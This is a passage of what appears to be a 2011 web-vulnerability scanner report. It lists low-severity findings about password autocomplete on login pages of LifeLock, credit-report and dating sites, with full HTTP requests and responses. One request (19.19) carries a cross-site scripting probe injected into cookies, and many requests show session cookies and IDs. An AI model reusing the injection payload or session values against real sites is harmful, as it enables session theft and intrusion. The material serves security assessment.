Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5204

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../?wicket:interface=:2:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.15. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:17:39 GMT
Set-Cookie: JSESSIONID=56C81A3919D462F081975B51ACDD4CBA.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:32:39 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=6735fba8dd0363eaf0f873807ccce0072a13aa513f3374884db39653; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../;jsessionid=56C81A3919D462F081975B51ACDD4CBA.lptom03_8000?wicket:interface=:0:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.16. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; JSESSIONID=A9556607FC26978DF3DD3EBCCA32DF76.lptom02_8000; isWebstoreEnrollmentPage=true; TS376161=b910cd8565f99bb66a75426772fe17675438784dc7b0156d4db392b3; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5204

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../?wicket:interface=:4:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.17. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; JSESSIONID=A9556607FC26978DF3DD3EBCCA32DF76.lptom02_8000; isWebstoreEnrollmentPage=true; TS376161=b910cd8565f99bb66a75426772fe17675438784dc7b0156d4db392b3; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:16 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:33:16 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=ec211d75cb3823e318a54db8895e16195438784dc7b0156d4db39678; Path=/
Vary: Accept-Encoding
Content-Length: 5204

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../?wicket:interface=:6:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.18. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000?wicket:interface=:0:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.19. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; promoCode=NEXT; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:27 GMT
Set-Cookie: JSESSIONID=9790FFD3C6958FB558FADB5E05C2A226.lptom02_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:02:27 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=71110f9c07006363039c63ac56bae58946ffeb28c9da36154db4541f; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../;jsessionid=9790FFD3C6958FB558FADB5E05C2A226.lptom02_8000?wicket:interface=:0:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.20. https://vault.krypt.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: vault.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.2.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:06 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UBERSID=eahltn4p28bi0jqqtdkv5insg2; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2760
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Login</title>
   <link href="/locale/en_US/css/stylesheet
...[SNIP]...
<div style="text-align:center;padding:20% 0 0 0;margin:0;">
   <form action="?" name="loginform" method="post">
       <table width="350" border="0" align="center" cellpadding="0" cellspacing="0" style="background:#ffffff;border:1px solid #999999;margin:5px auto;">
...[SNIP]...
<td align="right"><input type="password" name="pass" id="pass" value="" style="width:150px;" /></td>
...[SNIP]...

19.21. https://www.creditchecktotal.com/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:46:05 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:46:05 GMT
ETag: "pvc1528d225343c67ac538d6eedf08f763"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U175B4979].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
       <form name="MasterPage" method="post" action="Login.aspx?SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare" id="MasterPage">
<input type="hidden" name="__CURRENTREFRESHTICKET" value="1" />
...[SNIP]...
<span id="loginUser_ecdPassword"><input name="loginUser:ecdPassword:password" type="password" maxlength="35" size="21" id="loginUser_ecdPassword_password" /></span>
...[SNIP]...

19.22. https://www.creditreport.com/dni/time-out.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/time-out.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /dni/time-out.aspx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox=session#1303691695619-486775#1303693798|PC#1303691695619-486775.17#1304901538|check#true#1303691998; mbox-experianuk=session#1303691695624-816974#1303693799|check#true#1303691998; mbox-experian=session#1303691695628-869024#1303693799|check#true#1303691999; mbox-protectmyidcom=session#1303691695631-207802#1303693799|check#true#1303691999; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20s_lv%3D1303691939108%7C1398299939108%3B%20s_lv_s%3DFirst%2520Visit%7C1303693739108%3B%20sc_dl%3D1%7C1303693739214%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditreport.com%252Fdni%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DC2TDM%2526SiteVersionID%253D967%2526SiteID%253D100332%2526sc%253D671917%2526bcd%253Dcomptst%7C1303693739223%3B%20gpv_PN%3D100332%253Adni%253Aorder1.aspx%7C1303693739231%3B; s_sess=%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_cp_paid%3D0%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+time-out; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:36:22 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=2a0ea07e078d45acbe75184e6bfdf00f; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:22 GMT
ETag: "pvfb53f30d38bdcd61e442d0aa9c8449f1"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U263B78D6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Exper
...[SNIP]...
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
       <form name="MasterPage" method="post" action="time-out.aspx" id="MasterPage">
<input type="hidden" name="__CURRENTREFRESHTICKET" value="1" />
...[SNIP]...
<span id="loginUser_ecdPassword"><input name="loginUser:ecdPassword:password" type="password" maxlength="35" size="40" id="loginUser_ecdPassword_password" /></span>
...[SNIP]...

19.23. http://www.dictof.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...
<div class="LoginIndex"> <form action="/login/" method="post"> <!--<p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/></dd>
...[SNIP]...

19.24. http://www.dictof.com/login/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /login/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/ HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
